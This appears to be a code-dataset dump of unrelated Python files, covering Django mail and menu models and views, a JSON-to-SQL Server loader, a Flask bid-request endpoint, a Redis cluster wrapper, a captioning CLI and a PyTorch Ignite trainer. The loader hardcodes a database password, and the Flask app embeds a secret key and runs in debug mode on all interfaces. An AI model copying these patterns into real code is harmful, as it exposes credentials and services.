verbose_name=\"パスワードお知らせ本文\")\n comment = models.CharField(max_length=255, blank=True, null=True, verbose_name=\"説明\")\n\n class Meta:\n db_table = 'mst_mail_template'\n ordering = ['title']\n verbose_name = verbose_name_plural = \"メールテンプレート\"\n\n def __str__(self):\n return self.title\n\n\nclass MailGroup(BaseModel):\n code = models.CharField(max_length=3, primary_key=True, choices=constants.CHOICE_MAIL_GROUP, verbose_name=\"コード\")\n name = models.CharField(max_length=50, blank=False, null=True, verbose_name=\"名称\")\n sender = models.EmailField(verbose_name=\"メール差出人\")\n template = models.ForeignKey(MailTemplate, on_delete=models.CASCADE, verbose_name=\"メールテンプレート\")\n\n class Meta:\n db_table = 'mst_mail_group'\n ordering = ['code']\n verbose_name = verbose_name_plural = \"メールグループ\"\n\n def __str__(self):\n return self.name\n\n def get_cc_list(self):\n \"\"\"メール送信時のCC一覧を取得する。\n\n :return:\n \"\"\"\n return MailCcList.objects.public_filter(group=self, is_bcc=False)\n\n def get_bcc_list(self):\n \"\"\"メール送信時のBCC一覧を取得する。\n\n :return:\n \"\"\"\n return MailCcList.objects.public_filter(group=self, is_bcc=True)\n\n @classmethod\n def get_subscription_send_group(cls):\n \"\"\"ユーザー申込み時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='010')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_subscription_completed_group(cls):\n \"\"\"ユーザー申込み完了時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='011')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_inspection_send_group(cls):\n \"\"\"審査用フォーム送付時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='012')\n except 
ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_inspection_completed_group(cls):\n \"\"\"審査用フォーム完了時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='013')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_contract_form_send_group(cls):\n \"\"\"ユーザー契約時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='040')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_contract_form_completed_group(cls):\n \"\"\"ユーザー契約完了時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='041')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_contract_send_group(cls):\n \"\"\"ユーザー契約時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='042')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_contract_other_send_group(cls):\n \"\"\"ユーザー契約時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='060')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_contract_cancellation_send_group(cls):\n \"\"\"ユーザー解約時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='310')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_parking_lot_cancellation_send_group(cls):\n \"\"\"物件解約時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='322')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_batch_key_alert_group(cls):\n \"\"\"駐車場の予備鍵数が足りない場合のメール送信設定を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='800')\n except ObjectDoesNotExist:\n return None\n\n def get_template_content(self, context):\n \"\"\"メールテンプレートの内容を取得する。\n\n :param context:\n :return:\n \"\"\"\n t_title = Template(self.template.title)\n t_body = Template(self.template.body)\n t_password = Template(self.template.password) if self.template.password else None\n comment = self.template.comment or ''\n ctx = Context(context)\n return {\n 'title': t_title.render(ctx),\n 'body': t_body.render(ctx),\n 'password': t_password.render(ctx) if t_password else '',\n 'comment': comment,\n }\n\n def send_main(self, recipient_list, context, user=None):\n \"\"\"メール送信する\n\n :param recipient_list:\n :param context:\n :param user:\n :return:\n \"\"\"\n content = self.get_template_content(context)\n mail_data = {\n 'sender': self.sender,\n 'recipient_list': recipient_list,\n 'cc_list': [cc.email for cc in self.get_cc_list()],\n 'bcc_list': [bcc.email for bcc in self.get_bcc_list()],\n 'mail_title': content.get('title'),\n 'mail_body': content.get('body'),\n }\n\n mail = EbMail(**mail_data)\n mail.send_email(user)\n\n\nclass MailCcList(BaseModel):\n group = models.ForeignKey(MailGroup, on_delete=models.CASCADE, verbose_name=\"メールグループ\")\n email = models.EmailField(verbose_name=\"メールアドレス\")\n is_bcc = models.BooleanField(default=False, verbose_name=\"BCC\")\n\n class Meta:\n db_table = 'mst_mail_cc'\n ordering = ['group', 'email']\n verbose_name = verbose_name_plural = \"メールCCリスト\"\n\n def __str__(self):\n return self.email\n\n\nclass BatchManage(BaseModel):\n name = models.CharField(max_length=50, unique=True, verbose_name=\"バッチID\")\n title = models.CharField(max_length=50, verbose_name=\"タイトル\")\n cron_tab = models.CharField(blank=True, null=True, max_length=100, verbose_name=\"実行タイミング\")\n is_active = models.BooleanField(default=True, verbose_name=\"有効フラグ\")\n comment = models.CharField(blank=True, null=True, max_length=255, 
verbose_name=\"説明\")\n\n class Meta:\n db_table = 'mst_batch_manage'\n verbose_name = \"バッチ管理\"\n verbose_name_plural = \"バッチ管理\"\n\n def __str__(self):\n return self.title\n\n def get_logger(self):\n \"\"\"バッチのロガーを取得する。\n\n :return:\n \"\"\"\n return common.get_batch_logger(self.name)\n\n @classmethod\n def get_log_entry_user(cls, username='batch'):\n \"\"\"ログエントリーにログを記録するにはログインユーザが必要\n\n :return:\n \"\"\"\n try:\n user = User.objects.get(username=username)\n return user\n except ObjectDoesNotExist:\n try:\n user = User.objects.get(username='admin')\n return user\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_batch_by_name(cls, name):\n \"\"\"指定した名前のバッチを取得する。\n\n :param name:\n :return:\n \"\"\"\n try:\n batch = BatchManage.objects.get(name=name)\n except ObjectDoesNotExist:\n batch = BatchManage(name=name)\n return batch\n\n\nclass PushNotification(BaseModel):\n user = models.ForeignKey(User, verbose_name=\"ユーザー\")\n registration_id = models.CharField(max_length=1000, verbose_name=\"デバイスの登録ID\")\n key_auth = models.CharField(max_length=100)\n key_p256dh = models.CharField(max_length=256)\n title = models.CharField(blank=True, null=True, max_length=100)\n message = models.CharField(blank=True, null=True, max_length=256)\n url = models.URLField(blank=True, null=True)\n\n class Meta:\n db_table = 'ap_push_notification'\n verbose_name = \"通知デバイス\"\n verbose_name_plural = \"通知デバイス一覧\"\n\n def __str__(self):\n return self.registration_id\n\n\nclass EMailLogEntry(models.Model):\n action_time = models.DateTimeField(_('action time'), default=timezone.now, editable=False)\n user = models.ForeignKey(User, on_delete=models.PROTECT, verbose_name=_('user'))\n sender = models.EmailField(verbose_name=\"差出人\")\n recipient = models.CharField(max_length=1000, verbose_name=\"宛先\")\n cc = models.CharField(max_length=1000, blank=True, null=True, verbose_name=\"CC\")\n bcc = models.CharField(max_length=1000, blank=True, null=True, verbose_name=\"BCC\")\n title = models.CharField(max_length=50, verbose_name=\"件名\")\n body = models.TextField(verbose_name=\"メール本文\")\n attachment = models.CharField(max_length=255, blank=True, null=True, verbose_name=\"添付ファイル名\")\n\n objects = models.Manager()\n\n class Meta:\n app_label = 'admin'\n managed = False\n db_table = 'ap_email_log'\n ordering = ['-action_time']\n verbose_name = verbose_name_plural = \"メール送信履歴\"\n","sub_path":"master/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":27585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"581496350","text":"import pymssql\r\nimport json\r\nimport sys\r\n\r\nlist1 = []\r\n\r\n\r\nclass json2sql:\r\n def me_json2sql(self, file_path):\r\n # 链接数据库\r\n conn = pymssql.connect('WIN-8D5O9I2ISMB', 'emily', '5258800a@', 'DBSource')\r\n cur = conn.cursor() # 创建游标对象,sql语句的执行基本都在游标上\r\n\r\n # 创建数据库表\r\n cur.execute(\"\"\"\r\n if not exists (select * from sysobjects a where a.name='IoStock')\r\n create table IoStock (\r\n count nchar(25),\r\n iostock_price_num nchar(25),\r\n unit_cost_num nchar(25),\r\n iostock_id nchar(255),\r\n iostock_bn nchar(255),\r\n branch_bn nchar(255),\r\n branch_name nchar(255),\r\n bn nchar(255),\r\n name nchar(255),\r\n barcode nchar(255),\r\n nums nchar(255),\r\n type nchar(255),\r\n iostock_time nchar(255),\r\n memo nchar(255),\r\n original_bn nchar(255),\r\n iostock_price nchar(255),\r\n unit_cost nchar(255),\r\n appropriation_no nchar(255)\r\n ) \"\"\") # 三引号的作用,将字符串原样复制\r\n\r\n # 打开json文件\r\n json_file = 
open(file_path, 'r', encoding='utf-8')\r\n tmp_file = json.load(json_file)[\"response\"] # 加载需要的字段\r\n print('tmp_file:', tmp_file)\r\n\r\n for j in tmp_file['lists']:\r\n sql_value = ( tmp_file[\"count\"],tmp_file[\"iostock_price_num\"],tmp_file[\"unit_cost_num\"],\r\n j[\"iostock_id\"], j[\"iostock_bn\"], j[\"branch_bn\"], j[\"branch_name\"],\r\n j[\"bn\"], j[\"name\"], j[\"barcode\"], j[\"nums\"], j[\"type\"], j[\"iostock_time\"],\r\n j[\"memo\"], j[\"original_bn\"], j[\"iostock_price\"], j[\"unit_cost\"], j[\"appropriation_no\"])\r\n list1.append(sql_value)\r\n print('list1', list1)\r\n try:\r\n cur.execute(\"\"\"truncate table IoStock\"\"\")\r\n sql = \"insert into IoStock values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\r\n cur.executemany(sql, list1)\r\n\r\n except:\r\n print('wrong')\r\n\r\n conn.commit()\r\n conn.close()\r\n # (count,iostock_price_num,unit_cost_num,iostock_id,iostock_bn,branch_bn,branch_name,bn,name,barcode,nums,type,iostock_time,memo,original_bn,iostock_price,unit_cost,appropriation_no)\r\n\r\n\r\nif __name__ == '__main__':\r\n s = json2sql()\r\n s.me_json2sql('C:/Users/Administrator/PycharmProjects/SHYLPro/Data2.json')\r\n","sub_path":"SHYL/IoStock.py","file_name":"IoStock.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"584740170","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\n@author: Shuai Yuan\n@date: 20/03/2015\n\"\"\"\n\nimport json\n\nfrom flask import Flask\n\nfrom request import get_random_bid_request, send_request\n\nSECRET_KEY = '\\\\\\xc1\\xbc\\x1a\\xbe\\n\\x87:T\\xbby+\\x9an\\xdc}\\xfe\\xf4\\xe2x('\n\napp = Flask(__name__)\n\n\n@app.route('/random_bid_request/')\ndef random_bid_request():\n req = get_random_bid_request()\n\n resp = send_request(req, 'http://localhost:8081/random_bid_response/')\n\n req = json.dumps(req, indent=4)\n resp = json.dumps(resp, indent=4)\n\n return req + '\\n' + resp\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8082, debug=True)\n\n","sub_path":"pyrequester/pyrequester/ssp.py","file_name":"ssp.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"586132533","text":"\"\"\"polliato URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/dev/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom tastypie.api import Api\n#from django.urls import path\nfrom api.resources import UserResource, CandidateResource, BallotResource, FeedResource, MessageResource\n\nv1_api = Api(api_name='v1')\nv1_api.register(UserResource())\nv1_api.register(CandidateResource())\nv1_api.register(BallotResource())\nv1_api.register(FeedResource())\nv1_api.register(MessageResource())\n\nurlpatterns = [\n url('admin/', admin.site.urls),\n url('api/', include(v1_api.urls))\n]\n\n\n","sub_path":"server/polliato/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"368871044","text":"# -*- coding=utf-8 -*-\n\nfrom models.models import User, News\n\n\nclass ModelTransferHelper(object):\n keys_relation = []\n obj = None\n\n def transfer_to_py(self, data):\n # model = dict(map(lambda x: (x[1], '' if data.get(x[0]) is None else data[x[0]]), self.keys_relation))\n for key in self.keys_relation:\n ts_attr = key[0]\n d = data.get(ts_attr)\n setattr(self.obj, key[1], d)\n\n return self.obj\n\n\nclass UserModelTransferHelper(ModelTransferHelper):\n\n def __init__(self):\n self.keys_relation = [('id', 'id'), ('userName', 'user_name'), ('pwd', 'pwd')]\n self.obj = User()\n\n\nclass NewsModelTransferHelper(ModelTransferHelper):\n\n def __init__(self):\n self.keys_relation = [('id', 'id'), ('title', 'title'), ('category', 'category'), ('categoryName', 'category_name'), \n ('summary', 'summary'), ('thumbnail', 'thumbnail'), ('author', 'author'), ('source', 'source'),\n ('publishDate', 'publish_date'), ('content', 'content')]\n self.obj = News()\n","sub_path":"api/helper/model_transfer_helper.py","file_name":"model_transfer_helper.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"335176319","text":"import numpy as np\nfrom turtle import *\nimport random\n\n\ndef walking(colo):\n # Setting up the turtle\n setposition(0,0)\n shape(\"turtle\")\n color(colo)\n screensize(500, 500)\n speed(30)\n # Initiate the steps\n steps = 0\n\n while True:\n choice = np.random.randint(5, size = 1)\n if choice == 1:\n fd(10)\n steps += 1\n elif choice == 2:\n rt(90)\n fd(10)\n steps += 1\n elif choice == 3:\n left(90)\n fd(10)\n steps += 1\n else:\n backward(10)\n steps += 1\n\n done()\n\nif __name__ == \"__main__\":\n walking(\"mediumturquoise\")\n","sub_path":"Simulation/Single_Random_Walk.py","file_name":"Single_Random_Walk.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"355450824","text":"from typing import Any, Callable, Dict, Iterable, Iterator, List, Optional, Sequence, Union\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Optimizer\n\nfrom ignite.engine import Engine, _prepare_batch\nimport ignite.distributed as idist\n\n\nclass Model:\n def __init__(\n self,\n model: Union[nn.Module, Dict[str, nn.Module]],\n optimizer: Union[Optimizer, Dict[str, Optimizer]],\n loss_fn: Union[nn.Module, Dict[str, nn.Module]],\n device: Optional[torch.device] = None,\n ddp: bool = False,\n # amp_mode: str = False\n ):\n\n self.model = model\n self.optimizer = optimizer\n self.loss_fn = loss_fn\n self.device = device\n self.ddp = ddp\n # self.amp_mode = amp_mode\n\n # check 
model/optimizer/loss_fn here\n self._check_model()\n self._check_optimizer()\n self._check_loss_fn()\n\n def _check_model(self):\n if (not isinstance(self.model, nn.Module)) and (not isinstance(self.model, dict)):\n raise TypeError(\"for single model: the model should be torch.nn.Module, \"\n \"and for multiple models: the models should \"\n \"be dict['model_name': torch.nn.Module], but got \"\n f\"{type(self.model).__name__}\")\n\n def _check_optimizer(self):\n if (not isinstance(self.optimizer, Optimizer)) and (not isinstance(self.optimizer, dict)):\n raise TypeError(\"for single optimizer: the optimizer should be torch.optim.Optimizer, \"\n \"and for multiple optimizers: the optimizers should \"\n \"be dict['optimizer_name': torch.optim.Optimizer], but got \"\n f\"{type(self.optimizer).__name__}\")\n\n def _check_loss_fn(self):\n if (not isinstance(self.loss_fn, nn.Module)) and (not isinstance(self.loss_fn, dict)):\n raise TypeError(\"for single loss_fn: the loss_fn should be torch.nn.Module, \"\n \"and for multiple loss_fns: the loss_fns should \"\n \"be dict['loss_fn_name': torch.nn.Module], but got \"\n f\"{type(self.loss_fn).__name__}\")\n\n def _check_device(self):\n if not isinstance(self.device, torch.device):\n raise TypeError(f\"device must be a torch.device, but found {type(self.device).__name__}\")\n\n def _check_data(self):\n if self.ddp and not isinstance(self.data, dict):\n raise TypeError(\"in this case the data must be a \"\n \"dict['data': torch.utils.data.Dataset, 'batch_size': int, 'num_workers': int, etc..]\")\n\n def _create_auto_training(self):\n if isinstance(self.model, dict):\n for key in self.model.keys():\n self.model[key] = idist.auto_model(self.model[key])\n for key in self.optimizer.keys():\n self.optimizer[key] = idist.auto_optim(self.optimizer[key])\n for key in self.loss_fn.keys():\n self.loss_fn[key] = self.loss_fn[key].to(idist.device())\n else:\n self.model = idist.auto_model(self.model) \n self.optimizer = idist.auto_optim(self.optimizer)\n self.loss_fn = self.loss_fn.to(idist.device())\n\n def train_step(self, engine: Engine, batch: Sequence[torch.Tensor]):\n self.model.train()\n self.optimizer.zero_grad()\n X, y = _prepare_batch(batch)\n X = X.to(self.device)\n y = y.to(self.device)\n y_pred = self.model(X)\n loss = self.loss_fn(y_pred, y)\n loss.backward()\n self.optimizer.step()\n return {\"prediction\": y_pred, \"target\": y, \"loss\": loss.item()}\n\n def fit(\n self,\n data: Union[Iterator, Dict[str, Any]],\n num_epochs: Union[int, Dict[str, int]]\n ):\n self.data = data\n self._check_data()\n if self.ddp:\n def training(local_rank):\n self._create_auto_training()\n dataloader = idist.auto_dataloader(**data)\n train_engine = Engine(self.train_step)\n train_engine.run(dataloader, num_epochs)\n with idist.Parallel(backend='nccl') as parallel:\n parallel.run(training)\n else:\n self.model = self.model.to(self.device)\n self.loss_fn = self.loss_fn.to(self.device)\n train_engine = Engine(self.train_step)\n train_engine.run(data, num_epochs)\n\n def validate(self):\n pass\n\n def predict(self):\n pass\n\n\n# #########################################\n# ## Example 1 (Supervised Learning)\n# ## Single (model/optimizer/loss_fn)\n# #########################################\n# dataloader = DataLoader(...)\n# model = torch.nn.Module\n# optimizer = torch.optim.Optimizer\n# loss_fn = torch.nn.Module\n# model = Model(model, optimizer, loss_fn)\n# model.fit(dataloader, num_epochs=100)\n\n\n# 
#########################################\n# ## Example 2 (GANs)\n# ## Two (models, optimizers, loss_fns)\n# #########################################\n# dataloader = DataLoader(...)\n\n# model = {'generator': torch.nn.Module, 'discriminator': torch.nn.Module}\n# optimizer = {'generator': torch.optim.Optimizer, 'discriminator': torch.optim.Optimizer}\n# loss_fn = {'generator': torch.nn.Module, 'discriminator': torch.nn.Module}\n# num_epochs = {'generator': int, 'discriminator': int}\n\n# class CustomModel(Model):\n# def train_step(self, engine, batch):\n# \"\"\"\n# implement a train_step method\n# for training gans\n# \"\"\"\n # self.model[\"generator\"] = ...\n # self.optimizer[\"discriminator\"] = ...\n\n# model = CustomModel(model, optimizer, loss_fn)\n# model.fit(dataloader, num_epochs=num_epochs)\n\n\n# #########################################\n# ## Example 3 (DDP)\n# ## Single (model/optimizer/loss_fn)\n# #########################################\n# dataset = {'data': torch.utils.data.Dataset, 'batch_size': int, etc..}\n# model = torch.nn.Module\n# optimizer = torch.optim.Optimizer\n# loss_fn = torch.nn.Module\n# model = Model(model, optimizer, loss_fn, ddp=True)\n# model.fit(dataset, num_epochs=100)\n\n\n# #########################################\n# ## Example 4 (DDP) (GANs)\n# ## Two (models/optimizers/loss_fns)\n# #########################################\n# dataset = {'data': torch.utils.data.Dataset, 'batch_size': int, etc..}\n\n# model = {'generator': torch.nn.Module, 'discriminator': torch.nn.Module}\n# optimizer = {'generator': torch.optim.Optimizer, 'discriminator': torch.optim.Optimizer}\n# loss_fn = {'generator': torch.nn.Module, 'discriminator': torch.nn.Module}\n# num_epochs = {'generator': int, 'discriminator': int}\n\n# class CustomModel(Model):\n# def train_step(self, engine, batch):\n# \"\"\"\n# implement a train_step method\n# for training gans\n# \"\"\"\n # self.model[\"generator\"] = ...\n # self.optimizer[\"discriminator\"] = ...\n\n# model = CustomModel(model, optimizer, loss_fn, ddp=True)\n# model.fit(dataset, num_epochs=num_epochs)","sub_path":"Approach4/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":7077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"599943197","text":"import asyncio\nfrom typing import List\n\nfrom rain.redis.client import Redis\nfrom rain.redis.others import crc16\n\n\n# noinspection PyMissingConstructor\nclass RedisCluster(Redis):\n\tdef __init__(self, *nodes: dict):\n\t\tself.nodes: List[Redis] = list(map(lambda x: Redis(**x), nodes))\n\t\tself.size = len(nodes)\n\n\t\tself._command_funcs = {}\n\n\tasync def _ainit(self):\n\t\tfor n in self.nodes:\n\t\t\tawait n._ainit()\n\n\tdef _command_wrapper(self, command):\n\t\tif command not in self._command_funcs:\n\t\t\tasync def execute(key, *args, **kwargs):\n\t\t\t\tclient = self.nodes[crc16(key.do_encode()) % self.size]\n\t\t\t\treturn await getattr(client, command)(key, *args, **kwargs)\n\n\t\t\texecute.__qualname__ = 'RedisCluster.{}'.format(command)\n\t\t\tself._command_funcs[command] = execute\n\n\t\treturn self._command_funcs[command]\n\n\tdef __getattribute__(self, item): # Redis client proxy\n\t\tif item in {\n\t\t\t'nodes', 'size', '_enter',\n\t\t\t'_command_wrapper', '_command_funcs',\n\t\t\t'_ainit', 'new'\n\t\t}:\n\t\t\treturn super().__getattribute__(item)\n\n\t\treturn self._command_wrapper(item)\n\n\t@classmethod\n\tasync def new(cls, *nodes: dict) -> 'RedisCluster':\n\t\tcluster = cls(*nodes)\n\t\tawait 
cluster._ainit()\n\n\t\treturn cluster\n\n\ndef create_redis_cluster(*redis_conf: dict, loop=None) -> RedisCluster:\n\tif not loop:\n\t\tloop = asyncio.get_event_loop()\n\treturn loop.run_until_complete(RedisCluster.new(*redis_conf))\n","sub_path":"rain/redis/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"648546540","text":"import sys\nfrom utils import extract_classifiers \nfrom eval.captioner import * \nfrom eval import eval_sentences\nfrom train_captions import transfer_weights\nimport argparse\nimport pdb \nfrom utils.config import *\n\ndef extract_features(args):\n extract_classifiers.extract_features(args.image_model, args.model_weights, args.imagenet_images, args.device, args.image_dim, args.lexical_feature, args.batch_size)\n\ndef transfer(args):\n \n transfer_net = transfer_weights.transfer_net(args.language_model, args.model_weights, args.orig_attributes, args.all_attributes, args.vocab)\n eval('transfer_net.' + args.transfer_type)(args.words, args.classifiers, args.closeness_metric, args.log, num_transfer=args.num_transfer, orig_net_weights=args.orig_model) \n\ndef generate_coco(args):\n #args.model_weights, args.image_model, args.language_model, args.vocab, args.image_list, args.precomputed_features\n\n model_weights = caption_weights_root + args.model_weights\n image_model = models_root + args.image_model\n language_model = models_root + args.language_model\n vocab = vocab_root + args.vocab\n if args.precomputed_features:\n precomputed_feats = feature_dir + args.precomputed_features\n else:\n precomputed_feats = args.precomputed_features\n\n image_list = open_txt(image_list_root + args.image_list)\n\n captioner = Captioner(model_weights, image_model, language_model, vocab, precomputed_feats=precomputed_feats,\n prev_word_restriction=True, image_feature=args.image_feature, language_feature=args.language_feature)\n gen_json = captioner.generate_sentences(coco_images_root, image_list, temp=float('inf'), dset='coco', tag='val_val_beam1_coco')\n gt_json = annotations + 'captions_%s2014.json' %args.split\n new_words = ['bus', 'bottle', 'couch', 'microwave', 'pizza', 'racket', 'suitcase', 'zebra']\n #new_words = ['suitcase', 'zebra']\n eval_sentences.add_new_word(gt_json, gen_json, new_words)\n\ndef generate_imagenet(args):\n #args.model_weights, args.image_model, args.language_model, args.vocab, args.image_list, args.precomputed_features\n\n model_weights = caption_weights_root + args.model_weights\n image_model = models_root + args.image_model\n language_model = models_root + args.language_model\n vocab = vocab_root + args.vocab\n precomputed_feats = feature_dir + args.precomputed_features\n\n image_list = open_txt(image_list_root + args.image_list)\n\n captioner = Captioner(model_weights, image_model, language_model, vocab, precomputed_feats=precomputed_feats,\n prev_word_restriction=True, image_feature='data', language_feature='probs')\n captioner.generate_sentences(imagenet_images_root, image_list, temp=float('inf'), dset='imagenet')\n\ndef eval_imagenet(args):\n result = eval_sentences.make_imagenet_result_dict(generated_sentences + args.caps) \n eval_sentences.find_successful_classes(result)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image_model\",type=str)\n parser.add_argument(\"--language_model\",type=str)\n parser.add_argument(\"--model_weights\",type=str)\n 
parser.add_argument(\"--image_list\", type=str)\n parser.add_argument(\"--imagenet_images\",type=str, default=None) #extract_features\n parser.add_argument(\"--lexical_feature\",type=str, default='probs') #name of layer to extract\n parser.add_argument(\"--orig_attributes\",type=str, default='')\n parser.add_argument(\"--all_attributes\",type=str, default='')\n parser.add_argument(\"--vocab\", type=str, default='')\n parser.add_argument(\"--words\", type=str, default='')\n parser.add_argument(\"--precomputed_features\", type=str, default=None) #list of classifiers\n parser.add_argument(\"--classifiers\", type=str, default='') #list of classifiers\n parser.add_argument(\"--closeness_metric\", type=str, default='closeness_embedding')\n parser.add_argument(\"--transfer_type\", type=str, default='direct_transfer')\n parser.add_argument(\"--split\", type=str, default='val_val')\n parser.add_argument(\"--caps\", type=str, default='')\n\n parser.add_argument(\"--orig_model\", type=str, default='')\n parser.add_argument(\"--new_model\", type=str, default='')\n parser.add_argument(\"--language_feature\", type=str, default='predict')\n parser.add_argument(\"--image_feature\", type=str, default='data')\n\n parser.add_argument(\"--device\",type=int, default=0)\n parser.add_argument(\"--image_dim\",type=int, default=227)\n parser.add_argument(\"--batch_size\",type=int, default=10)\n parser.add_argument(\"--num_transfer\",type=int, default=1)\n\n parser.add_argument('--extract_features', dest='extract_features', action='store_true')\n parser.set_defaults(extract_features=False)\n parser.add_argument('--generate_coco', dest='generate_coco', action='store_true')\n parser.set_defaults(generate_coco=False)\n parser.add_argument('--generate_imagenet', dest='generate_imagenet', action='store_true')\n parser.set_defaults(generate_imagenet=False)\n parser.add_argument('--eval_imagenet', dest='eval_imagenet', action='store_true')\n parser.set_defaults(eval_imagenet=False)\n parser.add_argument('--transfer', dest='transfer', action='store_true')\n parser.set_defaults(transfer=False)\n parser.add_argument('--log', dest='log', action='store_true')\n parser.set_defaults(log=False)\n\n args = parser.parse_args()\n \n if args.extract_features:\n extract_features(args) \n\n if args.transfer:\n transfer(args)\n\n if args.generate_coco:\n generate_coco(args)\n\n if args.generate_imagenet:\n generate_imagenet(args)\n \n if args.eval_imagenet:\n eval_imagenet(args)\n","sub_path":"dcc.py","file_name":"dcc.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"171477071","text":"from django.shortcuts import render\r\nfrom django.http import Http404, HttpResponse\r\nfrom django.shortcuts import render, redirect\r\nfrom .models import product\r\nfrom orders.models import order, basket\r\nimport json\r\n\r\ndef index(request):\r\n # products = {\r\n # 'Супы':product.objects.filter(category='1'),\r\n # 'Гарниры':product.objects.filter(category='2'),\r\n # 'Горячие блюда':product.objects.filter(category='3'),\r\n # 'Салаты':product.objects.filter(category='4'),\r\n # 'Завтраки':product.objects.filter(category='5'),\r\n # 'Выпечка':product.objects.filter(category='6'),\r\n # 'Дополнительно':product.objects.filter(category='7'),\r\n # }\r\n\r\n products = product.objects.all\r\n categories = [\r\n 'Супы',\r\n 'Гарниры',\r\n 'Горячие блюда',\r\n 'Салаты',\r\n 'Завтраки',\r\n 'Выпечка',\r\n 'Другое'\r\n ]\r\n try:\r\n order_now = 
order.objects.get(user=request.user, status_pay=False)\r\n in_basket = basket.objects.filter(order=order_now)\r\n basket_items = []\r\n for i in in_basket:\r\n # print(i.product)\r\n basket_items.append(i.product)\r\n context = {'page':'Меню', 'products': products, 'categories':categories, 'basket':basket_items}\r\n except:\r\n context = {'page':'Меню', 'products': products, 'categories':categories}\r\n # print(products)\r\n return render(request, 'menu_page.html', context)\r\n\r\ndef add_product(request):\r\n if request.method == \"POST\" and request.is_ajax:\r\n data={\r\n 'product_id': request.POST.get('product_id')\r\n }\r\n json_dist = json.dumps(data)\r\n # print(json_dist)\r\n dist = json.loads(json_dist)\r\n this_product = product.objects.get(id=int(dist['product_id']))\r\n \r\n this_order, created = order.objects.get_or_create(user=request.user, status_pay=False)\r\n\r\n\r\n try:\r\n pib = basket.objects.get(order=this_order, product=this_product)\r\n # print ('получили продукт',pib)\r\n pib.delete()\r\n if not this_order.products.all():\r\n this_order.delete()\r\n except basket.DoesNotExist:\r\n basket.objects.create(order=this_order, product=this_product)\r\n finally:\r\n pass\r\n\r\n # if basket.objects.filter(order=this_order, product=this_product):\r\n # print('товар есть в корзине')\r\n # pib = basket.objects.filter(order=this_order).get(product=this_product) #product in basket\r\n \r\n \r\n \r\n # data['error']='Что-то пошло не так :('\r\n # if basket.objects.filter(order=this_order, product=this_product):\r\n # # print('товар есть в корзине')\r\n # pib = basket.objects.filter(order=this_order).get(product=this_product) #product in basket\r\n # pib.quantity += int(dist['product_quantity'])\r\n # if pib.quantity >5:\r\n # print('true')\r\n # data['error']='В корзине не может быть больше пяти порций товара!'\r\n # else:\r\n # print('false')\r\n # pib.save()\r\n # else:\r\n # # print('товара нет в корзине')\r\n # this_order.products.add(this_product)\r\n # pib = basket.objects.filter(order=this_order).get(product=this_product) #product in basket\r\n # pib.quantity = 